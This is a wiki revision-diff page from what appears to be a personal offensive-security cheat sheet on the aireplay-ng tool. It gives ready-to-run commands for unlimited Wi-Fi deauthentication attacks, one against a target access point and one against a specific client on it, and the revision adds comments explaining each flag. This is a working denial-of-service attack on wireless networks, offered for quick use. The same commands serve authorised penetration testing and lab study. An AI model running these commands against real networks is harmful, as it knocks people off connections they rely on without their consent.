User Tools

Site Tools


docu:csheet:ofsec:hack:wifi:aireplay

Differences

This shows you the differences between two versions of the page.

Link to this comparison view

docu:csheet:ofsec:hack:wifi:aireplay [2020/02/08 21:04]
admin created
docu:csheet:ofsec:hack:wifi:aireplay [2020/02/08 21:20] (current)
admin
Line 9: Line 9:
 Launch deauth attacks Launch deauth attacks
 <code bash> <code bash>
 +# --deauth or -0 | works the same
 +# --deauth #     | number of deauthentications (0 to infinite)
 +# -a MAC         | mac address of the target Access Point BSSID
 +# -c MAC         | mac address of the client associated to target
 aireplay-ng --deauth 0 -a [TARGET_BSSID] wlan0mon aireplay-ng --deauth 0 -a [TARGET_BSSID] wlan0mon
 aireplay-ng --deauth 0 -a [TARGET_BSSID] -c [TARGET_CLIENT] wlan0mon aireplay-ng --deauth 0 -a [TARGET_BSSID] -c [TARGET_CLIENT] wlan0mon
docu/csheet/ofsec/hack/wifi/aireplay.1581195864.txt.gz · Last modified: 2020/02/08 21:04 by admin